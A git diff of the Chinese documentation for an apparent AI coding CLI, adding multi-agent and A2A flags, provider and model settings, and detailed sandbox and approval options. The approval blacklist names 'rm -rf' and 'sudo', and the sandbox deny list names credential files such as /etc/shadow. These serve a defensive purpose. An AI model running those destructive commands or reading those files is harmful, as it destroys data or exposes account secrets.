+**完整变更日志**: https://github.com/startvibecoding/vibecoding/compare/v0.1.26...v0.1.27
diff --git a/docs/zh/cli-reference.md b/docs/zh/cli-reference.md
index 7ec0d85..03013d9 100644
--- a/docs/zh/cli-reference.md
+++ b/docs/zh/cli-reference.md
@@ -18,6 +18,7 @@ vibecoding [flags] [message...]
 | `--model` | `-m` | 配置文件中的默认值 | 模型 ID |
 | `--mode` | `-M` | `agent` | 运行模式 (plan, agent, yolo) |
 | `--thinking` | `-t` | `off` | 思考级别 (off, minimal, low, medium, high, xhigh) |
+| `--multi-agent` | - | `false` | 启用多 Agent 工具和命令 |
 
 ### 会话管理
 
@@ -46,6 +47,10 @@ vibecoding [flags] [message...]
 
 | 参数 | 简写 | 描述 |
 |------|------|------|
+| `--init-gateway` | - | 生成 `gateway.json` 配置模板 |
+| `--init-a2a-master-config` | - | 生成 `a2a-list.json` 配置模板 |
+| `--enable-a2a-master` | - | 启用 A2A Master 模式（远程 agent 调度） |
+| `--force` | - | 覆盖已存在的配置文件（配合 `--init-*` 使用） |
 | `--version` | `-v` | 显示版本 |
 | `--help` | `-h` | 显示帮助 |
 
@@ -70,9 +75,31 @@ vibecoding acp [flags]
 | `--sandbox` | - | false | 启用沙箱 |
 | `--verbose` | - | false | 详细输出 |
 | `--debug` | - | false | 调试日志 |
+| `--multi-agent` | - | false | 为 ACP 会话启用多 Agent 工具 |
 
 详见 [ACP 协议](acp.md) 文档了解 IDE 集成细节。
 
+### `a2a` - A2A 协议服务器
+
+运行 A2A (Agent-to-Agent) 协议服务器，支持独立模式和集成模式。
+
+```
+vibecoding a2a [command]
+```
+
+| 子命令 | 描述 |
+|--------|------|
+| `start` | 启动 A2A 服务器 |
+| `stop` | 停止 A2A 服务器 |
+| `status` | 查看服务器状态 |
+| `card` | 显示/生成 Agent Card |
+| `send <message>` | 向远程 A2A 服务器发送任务 |
+| `discover <url>` | 发现远程 Agent Card |
+| `--init-a2a-config` | 生成 `a2a.json` 配置模板 |
+| `--force` | 覆盖已存在的配置文件 |
+
+详见 [A2A 协议](a2a.md) 文档。
+
 ## 使用示例
 
 ### 基本使用
@@ -114,6 +141,49 @@ vibecoding -M agent
 vibecoding -M yolo
 ```
 
+### 多 Agent 模式
+
+```bash
+# 启用子 Agent 工具和多 Agent 命令
+vibecoding --multi-agent
+
+# ACP 会话也可以启用
+vibecoding acp --multi-agent
+```
+
+启用后，VibeCoding 会注册 `subagent_*` 工具，并支持后台委托调查等多 Agent 工作流。Cron 命令入口也依赖多 Agent 模式。
+
+### A2A Master 模式
+
+```bash
+# 生成示例配置
+vibecoding --init-a2a-master-config
+
+# 启用 master 模式
+vibecoding --enable-a2a-master
+
+# 启用 master 模式 + 详细日志
+vibecoding --enable-a2a-master --verbose
+```
+
+启用后，VibeCoding 会加载 `a2a-list.json` 中的远程 agent 列表，注册 `a2a_dispatch` tool，LLM 可自动向远程 agent 分发任务。
+
+### 初始化配置
+
+```bash
+# 生成 gateway.json 模板
+vibecoding --init-gateway
+
+# 生成 a2a.json 模板
+vibecoding a2a --init-a2a-config
+
+# 生成 a2a-list.json 模板
+vibecoding --init-a2a-master-config
+
+# 强制覆盖已存在的文件
+vibecoding --init-gateway --force
+```
+
 ### 思考级别
 
 ```bash
diff --git a/docs/zh/configuration.md b/docs/zh/configuration.md
index c6fa34f..a9fa8ef 100644
--- a/docs/zh/configuration.md
+++ b/docs/zh/configuration.md
@@ -10,9 +10,11 @@ VibeCoding 使用两个配置文件:
 | `%APPDATA%\vibecoding\settings.json` | Windows | 全局 (所有项目) | 低 |
 | `.vibe/settings.json` | 全部 | 项目级 | 高 |
 
+> **提示:** 可以通过 `VIBECODING_DIR` 环境变量覆盖全局配置目录。
+
 > **Windows 用户：** `%APPDATA%` 实际展开为 `C:\Users\<用户名>\AppData\Roaming`，所以完整路径通常是 `C:\Users\<用户名>\AppData\Roaming\vibecoding\settings.json`。
 
-项目级配置会覆盖全局配置。
+项目级配置会覆盖全局配置。当两者同时存在时，标量字段会被项目配置覆盖；`providers` 是按 key 做深度合并的（项目中的 provider 会被添加到全局 providers 或替换同名的 provider，而不是替换整个 map）。
 
 ## 配置结构
 
@@ -25,19 +27,23 @@ VibeCoding 使用两个配置文件:
       "baseUrl": "https://api.deepseek.com/anthropic",
       "apiKey": "${DEEPSEEK_API_KEY}",
       "api": "anthropic-messages",
+      "thinkingFormat": "deepseek",
+      "cacheControl": false,
       "models": [
         {
           "id": "deepseek-v4-flash",
           "name": "DeepSeek-V4-Flash",
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 0.5, "output": 2.0 }
         },
         {
           "id": "deepseek-v4-pro",
           "name": "DeepSeek-V4-Pro",
           "reasoning": true,
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 1, "output": 4 }
         }
       ]
     },
@@ -50,101 +56,265 @@ VibeCoding 使用两个配置文件:
           "id": "deepseek-v4-flash",
           "name": "DeepSeek-V4-Flash",
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 0.5, "output": 2.0 }
         },
         {
           "id": "deepseek-v4-pro",
           "name": "DeepSeek-V4-Pro",
           "reasoning": true,
           "contextWindow": 1000000,
-          "maxTokens": 384000
+          "maxTokens": 384000,
+          "cost": { "input": 1, "output": 4 }
         }
       ]
-    },
-    "my-custom": {
-      "baseUrl": "https://my-api.example.com/v1",
-      "api": "openai-chat",
-      "models": []
     }
   },
   "defaultProvider": "deepseek-openai",
   "defaultModel": "deepseek-v4-flash",
   "defaultMode": "agent",
   "defaultThinkingLevel": "medium",
-  "maxOutputTokens": 384000,
+  "enablePlanTool": true,
   "maxContextTokens": 1000000,
+  "maxOutputTokens": 384000,
+  "contextFiles": {
+    "enabled": true,
+    "extraFiles": ["/path/to/extra-context.md"]
+  },
+  "skillsDir": "~/.vibecoding/skills",
   "compaction": {
     "enabled": true,
     "reserveTokens": 16384,
-    "keepRecentTokens": 20000
+    "keepRecentTokens": 20000,
+    "idleCompressionEnabled": false,
+    "idleTimeoutSeconds": 90,
+    "idleMinTokensForCompress": 150000
   },
   "sandbox": {
-    "enabled": true,
-    "level": "standard",
-    "allowNetwork": false
+    "enabled": false,
+    "level": "none",
+    "bwrapPath": "",
+    "allowNetwork": false,
+    "allowedRead": ["/usr", "/lib", "/lib64", "/bin", "/sbin"],
+    "allowedWrite": [],
+    "deniedPaths": ["/etc/shadow", "/root", "/home"],
+    "passEnv": ["PATH", "HOME", "USER", "LANG", "TERM", "SHELL"],
+    "tmpSize": "100m"
   },
-  "contextFiles": {
+  "sessionDir": "~/.vibecoding/sessions",
+  "shellPath": "/bin/bash",
+  "shellCommandPrefix": "",
+  "theme": "dark",
+  "retry": {
     "enabled": true,
-    "extraFiles": [
-      "/path/to/extra-context.md"
-    ]
+    "maxRetries": 3,
+    "baseDelayMs": 2000
   },
-  "skills": {
-    "enabled": true,
-    "dirs": [
-      "~/.vibecoding/skills",
-      ".skills"
-    ]
+  "approval": {
+    "bashWhitelist": ["go ", "make ", "git ", "npm ", "yarn ", "node ", "python ", "pip "],
+    "bashBlacklist": ["rm -rf", "sudo"],
+    "confirmBeforeWrite": true
   }
 }
 ```
 
+## 所有配置字段
+
+### 顶层字段速查表
+
+| 字段 | 类型 | 默认值 | 描述 |
+|------|------|--------|------|
+| `providers` | object | *(见下文)* | 提供商配置 (以名称为 key) |
+| `defaultProvider` | string | `"deepseek-openai"` | 默认使用的提供商 |
+| `defaultModel` | string | `"deepseek-v4-flash"` | 默认使用的模型 ID |
+| `defaultMode` | string | `"agent"` | 默认运行模式: `plan`, `agent`, `yolo` |
+| `defaultThinkingLevel` | string | `"medium"` | 默认思考级别 |
+| `enablePlanTool` | bool | `true` | 是否注册内置 `plan` 工具 |
+| `maxContextTokens` | int | `0` (自动) | 覆盖最大上下文 token 数 |
+| `maxOutputTokens` | int | `0` (自动) | 覆盖最大输出 token 数 |
+| `contextFiles` | object | *(见下文)* | 上下文文件加载设置 |
+| `skillsDir` | string | `"~/.vibecoding/skills"` | 全局技能目录路径 |
+| `compaction` | object | *(见下文)* | 上下文压缩设置 |
+| `sandbox` | object | *(见下文)* | 沙箱执行设置 |
+| `sessionDir` | string | `"~/.vibecoding/sessions"` | 会话文件存储目录 |
+| `shellPath` | string | `""` (自动) | 自定义 Bash 工具的 shell 路径 |
+| `shellCommandPrefix` | string | `""` | 每条 shell 命令前自动追加的前缀 |
+| `theme` | string | `"dark"` | UI 主题: `"dark"` 或 `"light"` |
+| `retry` | object | *(见下文)* | API 调用重试设置 |
+| `approval` | object | *(见下文)* | Bash 命令审批设置 |
+| `webSearch` | object | *(见下文)* | Hosted web search 设置 |
+
+---
+
 ## 配置项详解
 
 ### providers
 
-多提供商配置。每个提供商包含:
+多提供商配置。每个提供商是一个以用户自定义名称为 key 的对象:
+
+| 字段 | 类型 | 必填 | 默认值 | 描述 |
+|------|------|------|--------|------|
+| `baseUrl` | string | ✓ | — | API 基础 URL |
+| `vendor` | string | — | 自动检测 | 可选厂商适配器名称 (见下文) |
+| `apiKey` | string | — | `""` | API 密钥 (见[认证配置](#认证配置)) |
+| `api` | string | — | 自动检测 | API 协议: `"openai-chat"`、`"openai-responses"`、`"anthropic-messages"`、`"google-gemini"` 或 `"google-vertex"` |
+| `httpProxy` | string | — | `""` | 可选的 provider 级 HTTP 代理 URL，例如 `"http://127.0.0.1:7890"` |
+| `thinkingFormat` | string | — | 自动检测 | 思考参数格式 (见下文) |
+| `cacheControl` | bool | — | `false` | 启用 Anthropic 提示缓存；使用 Claude 模型时设为 `true` |
+| `models` | array | — | `[]` | 可用模型列表 |
+
+#### vendor 字段
+
+`vendor` 字段用于选择厂商适配器，不改变现有 provider 配置 schema。该字段可选；未设置时，VibeCoding 会先根据 `baseUrl` 自动识别厂商，再根据 `api` 回退到通用协议 provider。
+
+选择顺序：
+
+1. 显式 `vendor`
+2. `baseUrl` 自动识别
+3. 通用 fallback：`openai-chat`、`openai-responses`、`anthropic-messages`、`google-gemini` 或 `google-vertex`
+
+内置厂商适配器包括 `openai`、`anthropic`、`claude`、`deepseek`、`google-gemini`、`google-vertex`、`xiaomi`、`xiaomi-token-plan-ams`、`xiaomi-token-plan-cn`、`xiaomi-token-plan-sgp`、`kimi`、`minimax`、`seed`、`qianfan`、`bailian`、`gitee`、`openrouter`、`together`、`groq` 和 `fireworks`。
+
+```json
+{
+  "providers": {
+    "custom-deepseek": {
+      "vendor": "deepseek",
+      "baseUrl": "https://api.deepseek.com",
+      "apiKey": "${DEEPSEEK_API_KEY}",
+      "api": "openai-chat",
+      "models": [
+        { "id": "deepseek-v4-flash", "name": "DeepSeek-V4-Flash", "contextWindow": 1000000 }
+      ]
+    }
+  }
+}
+```
+
+### webSearch
+
+Hosted web search 设置。默认关闭。
 
-| 字段 | 类型 | 必填 | 描述 |
-|------|------|------|------|
-| `baseUrl` | string | ✓ | API 基础 URL |
-| `apiKey` | string | - | API 密钥 (可选，也可通过环境变量) |
-| `api` | string | - | API 类型: `openai-chat` 或 `anthropic-messages` |
-| `thinkingFormat` | string | - | 思考参数格式: `""`, `"openai"`, `"anthropic"`, `"xiaomi"` |
-| `models` | array | - | 可用模型列表 |
+| 字段 | 类型 | 必填 | 默认值 | 描述 |
+|------|------|------|--------|------|
+| `enabled` | bool | — | `false` | 启用 hosted web search 注册 |
+| `provider` | string | — | `defaultProvider` | 用于 web search 的 provider 配置名称 |
+| `providerType` | string | — | 自动 | Hosted tool 类型，通常是 `responses` 或 `messages` |
+| `model` | string | — | `""` | 可选 metadata，用于路由、展示或未来 provider-specific 处理 |
+
+```json
+{
+  "webSearch": {
+    "enabled": true,
+    "provider": "gpt",
+    "providerType": "responses",
+    "model": "gpt-5.4"
+  }
+}
+```
+
+当 `provider` 指向一个已配置的 provider 名称时，VibeCoding 会先解析该 provider 的 `baseUrl`、`api` 和 vendor 行为，再注册 hosted search tool。
 
 #### api 字段
 
-`api` 字段指定的是 **协议格式**，而非服务商。你可以将任意提供商指向任意兼容的端点：
+`api` 字段指定的是**协议格式**，而非服务商。你可以将任意提供商指向任意兼容的端点：
 
 - `openai-chat`: OpenAI Chat Completions API 格式
+- `openai-responses`: OpenAI Responses API 格式 (`POST /v1/responses`)
 - `anthropic-messages`: Anthropic Messages API 格式
+- `google-gemini`: 原生 Gemini API `streamGenerateContent` 格式
+- `google-vertex`: 原生 Vertex AI Gemini `streamGenerateContent` 格式
 
 例如，DeepSeek 在不同端点提供两种格式，你也可以用这些格式去连接真正的 OpenAI 或 Anthropic 服务。
 
-如果未指定，会根据 `baseUrl` 自动检测:
+如果未指定，会根据 `baseUrl` 自动检测：
+- 包含 `generativelanguage.googleapis.com` → `google-gemini`
+- 包含 `aiplatform.googleapis.com` → `google-vertex`
 - 包含 "anthropic" → `anthropic-messages`
 - 其他 → `openai-chat`
 
+Google 原生 provider 可以直接配置：
+
+```json
+{
+  "providers": {
+    "google-gemini": {
+      "baseUrl": "https://generativelanguage.googleapis.com/v1beta/models",
+      "apiKey": "${GOOGLE_API_KEY}",
+      "api": "google-gemini",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    },
+    "google-vertex": {
+      "baseUrl": "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models",
+      "apiKey": "!gcloud auth print-access-token",
+      "api": "google-vertex",
+      "models": [
+        { "id": "gemini-2.5-flash", "name": "Gemini 2.5 Flash", "reasoning": true, "contextWindow": 1000000, "maxTokens": 65536 }
+      ]
+    }
+  }
+}
+```
+
+上面的 `!gcloud auth print-access-token` 示例使用 shell 命令解析。使用 `!command` 值前需要设置 `VIBECODING_ALLOW_SHELL_CONFIG=1`，也可以改用 `${GOOGLE_VERTEX_TOKEN}` 这样的环境变量引用。
+
 #### thinkingFormat 字段
 
-指定思考/推理参数如何发送到 API:
+指定思考/推理参数如何发送到 API：
 
-- `""` (空): 根据 URL 自动检测
-- `"openai"`: 使用 OpenAI `reasoning_effort` 格式
-- `"anthropic"`: 使用 Anthropic `thinking` 带 `budget_tokens`
-- `"xiaomi"`: 使用 `thinking: {type: "enabled"}` 格式 (用于小米 MiMo API)
+| 值 | 行为 |
+|----|------|
+| `""` (空) | 根据 URL 自动检测 |
+| `"openai"` | 使用 OpenAI `reasoning_effort` 格式 |
+| `"anthropic"` | 使用 Anthropic `thinking` 带 `budget_tokens` |
+| `"deepseek"` | 使用 DeepSeek `thinking: {type: "enabled"}` + `reasoning_effort` (OpenAI) 或 `output_config.effort` (Anthropic) |
+| `"xiaomi"` | 旧的 thinking-only 格式: `thinking: {type: "enabled"}` |
 
-未设置时，如果 URL 包含 `xiaomimimo` 则自动检测为 `xiaomi` 格式。
+未设置时自动检测：
+- URL 包含 `deepseek` → `"deepseek"`
+- URL 包含 `xiaomimimo` → `"xiaomi"`
 
 ```json
 {
   "providers": {
-    "xiaomi": {
-      "baseUrl": "https://api.xiaomimimo.com/v1",
+    "deepseek-openai": {
+      "baseUrl": "https://api.deepseek.com",
       "apiKey": "sk-...",
       "api": "openai-chat",
-      "thinkingFormat": "xiaomi"
+      "thinkingFormat": "deepseek"
+    }
+  }
+}
+```
+
+#### cacheControl 字段
+
+启用 Anthropic 风格的提示缓存 (Prompt Caching)。设为 `true` 时，VibeCoding 会在请求中添加缓存控制头。**使用 Claude 模型接入 Anthropic API 时应启用此选项**，可降低费用和延迟。
+
+```json
+{
+  "providers": {
+    "anthropic": {
+      "baseUrl": "https://api.anthropic.com",
+      "apiKey": "${ANTHROPIC_API_KEY}",
+      "api": "anthropic-messages",
+      "cacheControl": true,
+      "models": [
+        {
+          "id": "claude-sonnet-4-20250514",
+          "name": "Claude Sonnet 4",
+          "contextWindow": 200000,
+          "maxTokens": 8192,
+          "cost": {
+            "input": 3,
+            "output": 15,
+            "cacheRead": 0.3,
+            "cacheWrite": 3.75
+          }
+        }
+      ]
     }
   }
 }
@@ -152,6 +322,46 @@ VibeCoding 使用两个配置文件:
 
 #### models 数组
 
+每个模型字段:
+
+| 字段 | 类型 | 默认值 | 描述 |
+|------|------|--------|------|
+| `id` | string | — | 发送到 API 的模型 ID |
+| `name` | string | — | 人类可读的显示名称 |
+| `reasoning` | bool | `false` | 是否支持思考/推理 |
+| `contextWindow` | int | `0` | 上下文窗口大小 (token) |
+| `maxTokens` | int | `0` | 每次响应的最大输出 token |
+| `input` | []string | `[]` | 支持的输入模态: `"text"`, `"image"` |
+| `cost` | object | `null` | 每百万 token 定价 |
+| `compat` | object | `null` | 模型级兼容标志，用于处理 provider 差异 |
+
+`cost` 对象:
+
+| 字段 | 类型 | 描述 |
+|------|------|------|
+| `input` | float | 每百万输入 token 费用 |
+| `output` | float | 每百万输出 token 费用 |
+| `cacheRead` | float | 每百万缓存读取 token 费用 (Anthropic) |
+| `cacheWrite` | float | 每百万缓存写入 token 费用 (Anthropic) |
+
+`compat` 对象可选，仅在某个模型需要协议兼容调整时设置：
+
+| 字段 | 类型 | 描述 |
+|------|------|------|
+| `thinkingFormat` | string | 覆盖模型 thinking 格式（`openai`、`deepseek`、`xiaomi`、`anthropic` 等） |
+| `requiresReasoningContentOnAssistant` | bool | 回放 assistant 消息时发送空 `reasoning_content` |
+| `requiresReasoningContentOnAssistantMessages` | bool | 参考实现中的别名，与上一项等价 |
+| `forceAdaptiveThinking` | bool | 强制使用 Anthropic adaptive thinking 格式 |
+| `supportsReasoningEffort` | bool | 模型是否接受 `reasoning_effort` |
+| `maxTokensField` | string | 使用 `max_tokens` 或 `max_completion_tokens` |
+| `supportsDeveloperRole` | bool | 是否支持 developer role 消息 |
+| `supportsStore` | bool | 是否支持 OpenAI `store` |
+| `supportsStrictMode` | bool | 是否支持严格工具 schema |
+| `supportsCacheControlOnTools` | bool | 是否支持在工具定义上使用 cache control |
+| `supportsLongCacheRetention` | bool | 是否支持长 prompt cache retention |
+| `sendSessionAffinityHeaders` | bool | 是否发送 session affinity headers |
+| `supportsEagerToolInputStreaming` | bool | 是否支持 Anthropic eager tool input streaming |
+
 ```json
 {
   "id": "deepseek-v4-flash",
@@ -167,132 +377,91 @@ VibeCoding 使用两个配置文件:
 }
 ```
 
-| 字段 | 类型 | 描述 |
-|------|------|------|
-| `id` | string | 模型 ID |
-| `name` | string | 显示名称 |
-| `contextWindow` | int | 上下文窗口大小 (token) |
-| `maxTokens` | int | 最大输出 token |
-| `reasoning` | bool | 是否支持推理/思考 |
-| `input` | []string | 支持的输入类型 (text, image) |
-| `cost` | object | 定价 (每百万 token) |
+---
 
 ### defaultProvider
 
-默认使用的提供商名称。对应 `providers` 中的键名。
+默认使用的提供商名称。必须对应 `providers` 中的一个 key。
 
 ```json
-{
-  "defaultProvider": "deepseek-openai"
-}
+{ "defaultProvider": "deepseek-openai" }
 ```
 
 ### defaultModel
 
-默认使用的模型 ID。
+默认使用的模型 ID。必须对应所选提供商 `models` 列表中的一个 `id`。
 
 ```json
-{
-  "defaultModel": "deepseek-v4-flash"
-}
+{ "defaultModel": "deepseek-v4-flash" }
 ```
 
 ### defaultMode
 
-默认运行模式。
+默认运行模式:
+
+| 值 | 描述 |
+|----|------|
+| `plan` | 只读分析模式 — 无文件写入，有沙箱 |
+| `agent` | 标准读写模式 (默认) — Bash 需要审批 |
+| `yolo` | 完全访问模式 — 所有工具自动执行 |
 
 ```json
-{
-  "defaultMode": "agent"
-}
+{ "defaultMode": "agent" }
 ```
 
-可选值:
-- `plan`: 只读分析模式
-- `agent`: 标准读写模式 (默认)
-- `yolo`: 完全访问模式
-
 ### defaultThinkingLevel
 
-默认思考级别。
+默认思考级别:
+
+| 值 | 描述 |
+|----|------|
+| `off` | 关闭思考 |
+| `minimal` | 最小思考 |
+| `low` | 低级别 |
+| `medium` | 中等级别 (默认) |
+| `high` | 高级别 |
+| `xhigh` | 最高级别 |
 
 ```json
-{
-  "defaultThinkingLevel": "medium"
-}
+{ "defaultThinkingLevel": "medium" }
 ```
 
-可选值:
-- `off`: 关闭思考
-- `minimal`: 最小思考
-- `low`: 低级别
-- `medium`: 中等级别
-- `high`: 高级别
-- `xhigh`: 最高级别
-
-### maxOutputTokens
+### enablePlanTool
 
-最大输出 token 数量。
+是否注册内置 `plan` 工具，允许 agent 创建和跟踪结构化任务计划。
 
 ```json
-{
-  "maxOutputTokens": 384000
-}
+{ "enablePlanTool": true }
 ```
 
+设为 `false` 可禁用（例如不希望 agent 使用结构化计划）。
+
 ### maxContextTokens
 
-最大上下文 token 数量。
+覆盖最大上下文 token 数。设为 `0` (默认) 时，根据模型的 `contextWindow` 自动确定。
 
 ```json
-{
-  "maxContextTokens": 200000
-}
+{ "maxContextTokens": 200000 }
 ```
 
-### compaction
+### maxOutputTokens
 
-上下文压缩配置，用于管理长对话。
+覆盖最大输出 token 数。设为 `0` (默认) 时，根据模型的 `maxTokens` 自动确定。
 
 ```json
-{
-  "compaction": {
-    "enabled": true,
-    "reserveTokens": 16384,
-    "keepRecentTokens": 20000
-  }
-}
+{ "maxOutputTokens": 16384 }
 ```
 
-| 字段 | 类型 | 默认值 | 描述 |
-|------|------|--------|------|
-| `enabled` | bool | true | 是否启用压缩 |
-| `reserveTokens` | int | 16384 | 为模型响应保留的 token |
-| `keepRecentTokens` | int | 20000 | 保留的最近消息 token |
+---
 
-### sandbox
+### contextFiles
 
-沙箱配置。
-
-```json
-{
-  "sandbox": {
-    "enabled": true,
-    "level": "standard",
-    "allowNetwork": false
-  }
-}
-```
+上下文文件加载设置。
 
 | 字段 | 类型 | 默认值 | 描述 |
 |------|------|--------|------|
-| `enabled` | bool | false | 是否启用沙箱 |
-| `level` | string | standard | 沙箱级别 (none, standard, strict) |
-| `allowNetwork` | bool | false | 是否允许网络访问 |
-
-### contextFiles
-
-上下文文件配置。
+| `enabled` | bool | `true` | 是否自动加载上下文文件 |
+| `extraFiles` | []string | `[]` | 额外的上下文文件路径 |
 
 ```json
 {
@@ -306,16 +475,11 @@ VibeCoding 使用两个配置文件:
 }
 ```
 
-| 字段 | 类型 | 默认值 | 描述 |
-|------|------|--------|------|
-| `enabled` | bool | true | 是否自动加载上下文文件 |
-| `extraFiles` | []string | [] | 额外的上下文文件路径 |
-
 #### 自动加载的上下文文件
 
 VibeCoding 会自动搜索并加载以下文件:
 
-1. **全局文件** (Linux/macOS: `~/.vibecoding/`, Windows: `%APPDATA%\vibecoding\`):
+1. **全局文件** (在全局配置目录中):
    - `AGENTS.md`
    - `CLAUDE.md`
 
@@ -325,68 +489,209 @@ VibeCoding 会自动搜索并加载以下文件:
    - `.vibe/AGENTS.md`
    - `.vibe/CLAUDE.md`
 
+---
+
 ### skillsDir
 
-技能目录路径。
+全局技能目录路径。支持 `~` 展开。
+
+| 平台 | 默认值 |
+|------|--------|
+| Linux/macOS | `~/.vibecoding/skills` |
+| Windows | `%APPDATA%\vibecoding\skills` |
+
+```json
+{ "skillsDir": "~/.vibecoding/skills" }
+```
+
+技能加载位置：
+- **全局技能**: `<skillsDir>/<name>/SKILL.md`
+- **项目技能**: `.skills/<name>/SKILL.md` (覆盖全局)
+
+---
+
+### compaction
+
+上下文压缩配置，用于管理长对话。当上下文窗口快满时，VibeCoding 会自动总结较旧的消息以继续对话。
+
+| 字段 | 类型 | 默认值 | 描述 |
+|------|------|--------|------|
+| `enabled` | bool | `true` | 启用自动上下文压缩 |
+| `reserveTokens` | int | `16384` | 为模型响应保留的 token |
+| `keepRecentTokens` | int | `20000` | 保留的最近消息 token 数 |
+| `idleCompressionEnabled` | bool | `false` | 启用空闲期间主动压缩 |
+| `idleTimeoutSeconds` | int | `90` | 用户空闲多少秒后触发空闲压缩 |
+| `idleMinTokensForCompress` | int | `150000` | 空闲压缩的最低上下文 token 阈值 |
 
 ```json
 {
-  "skillsDir": "~/.vibecoding/skills"
+  "compaction": {
+    "enabled": true,
+    "reserveTokens": 16384,
+    "keepRecentTokens": 20000,
+    "idleCompressionEnabled": true,
+    "idleTimeoutSeconds": 90,
+    "idleMinTokensForCompress": 150000
+  }
 }
 ```
 
-技能文件结构:
-- 全局技能:
-  - Linux/macOS: `~/.vibecoding/skills/<name>/SKILL.md`
-  - Windows: `%APPDATA%\vibecoding\skills\<name>\SKILL.md`
-- 项目技能: `.skills/<name>/SKILL.md` (覆盖全局)
+#### 空闲压缩
 
-### sessionDir
+启用后，VibeCoding 会在用户空闲期间（例如阅读输出或思考下一个提示时）主动压缩上下文。这可以减少下一次请求的延迟，因为上下文已经变小了。
+
+- **`idleCompressionEnabled`**: 默认关闭。如果你经常进行长对话，建议开启。
+- **`idleTimeoutSeconds`**: 上次交互后等待多久触发空闲压缩。默认 90 秒。
+- **`idleMinTokensForCompress`**: 只有当前上下文超过此阈值时才会触发空闲压缩。默认 150,000 token。
+
+---
+
+### sandbox
+
+沙箱执行配置。在 Linux 上使用 [bubblewrap (bwrap)](https://github.com/containers/bubblewrap)。
 
-会话文件存储目录。
+| 字段 | 类型 | 默认值 | 描述 |
+|------|------|--------|------|
+| `enabled` | bool | `false` | 启用沙箱执行 |
+| `level` | string | `"none"` | 沙箱级别: `"none"`, `"standard"`, `"strict"` |
+| `bwrapPath` | string | `""` (自动) | 自定义 `bwrap` 二进制文件路径 |
+| `allowNetwork` | bool | `false` | 沙箱内是否允许网络访问 |
+| `allowedRead` | []string | *(平台默认)* | 沙箱内可读路径 |
+| `allowedWrite` | []string | `[]` | 沙箱内额外可写路径 |
+| `deniedPaths` | []string | *(平台默认)* | 沙箱内明确禁止访问的路径 |
+| `passEnv` | []string | *(平台默认)* | 传入沙箱的环境变量 |
+| `tmpSize` | string | `"100m"` | 沙箱 `/tmp` tmpfs 挂载的大小限制 |
 
 ```json
 {
-  "sessionDir": "~/.vibecoding/sessions"  // Linux/macOS
-  // Windows: "%APPDATA%\\vibecoding\\sessions"
+  "sandbox": {
+    "enabled": true,
+    "level": "standard",
+    "bwrapPath": "/usr/bin/bwrap",
+    "allowNetwork": false,
+    "allowedRead": ["/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc/ssl"],
+    "allowedWrite": ["/tmp/my-build"],
+    "deniedPaths": ["/etc/shadow", "/root"],
+    "passEnv": ["PATH", "HOME", "USER", "LANG", "TERM", "SHELL", "GOPATH"],
+    "tmpSize": "200m"
+  }
 }
 ```
 
+#### 沙箱级别
+
+| 级别 | 文件系统 | 网络 | 用途 |
+|------|---------|------|------|
+| `none` | 完全访问 | ✓ | 无沙箱 (YOLO 模式默认) |
+| `standard` | 项目可读写 | ✗ | 日常开发 (Agent 模式) |
+| `strict` | 项目只读 | ✗ | 代码审查/分析 (Plan 模式) |
+
+#### allowedRead 平台默认值
+
+**Linux:**
+```json
+["/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc/ld.so.cache", "/etc/ssl", "/etc/ca-certificates", "/dev/null", "/dev/urandom", "/dev/zero", "/proc/self", "/proc/meminfo", "/proc/cpuinfo"]
+```
+
+**macOS:**
+```json
+["/usr", "/lib", "/bin", "/sbin", "/System", "/Library"]
+```
+
+**Windows:**
+```json
+["C:\\Windows", "C:\\Program Files", "C:\\Program Files (x86)"]
+```
+
+#### deniedPaths 平台默认值
+
+**Linux / macOS:**
+```json
+["/etc/shadow", "/etc/gshadow", "/etc/passwd", "/root", "/home"]
+```
+
+**Windows:**
+```json
+["C:\\Users\\<用户名>\\Documents", "C:\\Users\\<用户名>\\Desktop"]
+```
+
+#### passEnv 平台默认值
+
+**所有平台:** `PATH`, `HOME`, `USER`, `LANG`, `LC_ALL`, `TERM`
+
+**Linux 额外:** `SHELL`, `GOPATH`, `GOROOT`, `GOPROXY`, `GOMODCACHE`, `NODE_PATH`
+
+**macOS 额外:** `SHELL`, `TMPDIR`
+
+**Windows 额外:** `APPDATA`, `LOCALAPPDATA`, `COMPUTERNAME`, `USERPROFILE`, `SYSTEMROOT`
+
+---
+
+### sessionDir
+
+会话文件 (JSONL 格式) 存储目录。支持 `~` 展开。
+
+| 平台 | 默认值 |
+|------|--------|
+| Linux/macOS | `~/.vibecoding/sessions` |
+| Windows | `%APPDATA%\vibecoding\sessions` |
+
+```json
+{ "sessionDir": "~/.vibecoding/sessions" }
+```
+
+---
+
 ### shellPath
 
-自定义 shell 路径，用于 bash 工具。
+自定义 Bash 工具使用的 shell 路径。为空 (默认) 时使用平台默认值：
+
+| 平台 | 默认值 |
+|------|--------|
+| Linux | `$SHELL` 或 `/bin/bash` |
+| macOS | `$SHELL` 或 `/bin/zsh` |
+| Windows | `powershell.exe` 或 `cmd.exe` |
 
 ```json
-{
-  "shellPath": "/bin/bash"
-}
+{ "shellPath": "/usr/bin/fish" }
 ```
 
 ### shellCommandPrefix
 
-自定义命令前缀。
+每条 shell 命令执行前自动追加的前缀字符串。适用于设置环境或激活虚拟环境。
 
 ```json
-{
-  "shellCommandPrefix": ""
-}
+{ "shellCommandPrefix": "source ~/.venv/bin/activate && " }
 ```
 
+为空 (默认) 时直接执行命令。
+
+---
+
 ### theme
 
-UI 主题。
+终端界面的 UI 颜色主题。
+
+| 值 | 描述 |
+|----|------|
+| `"dark"` | 深色背景主题 (默认) |
+| `"light"` | 浅色背景主题 |
 
 ```json
-{
-  "theme": "dark"
-}
+{ "theme": "dark" }
 ```
 
-可选值: `dark`, `light`
+---
 
 ### retry
 
-API 调用重试配置。
+API 调用重试配置，使用指数退避策略。重试仅适用于初始 HTTP 连接阶段（一旦 SSE 流开始，不会重试）。
+
+| 字段 | 类型 | 默认值 | 描述 |
+|------|------|--------|------|
+| `enabled` | bool | `true` | 遇到瞬态 API 错误时自动重试 |
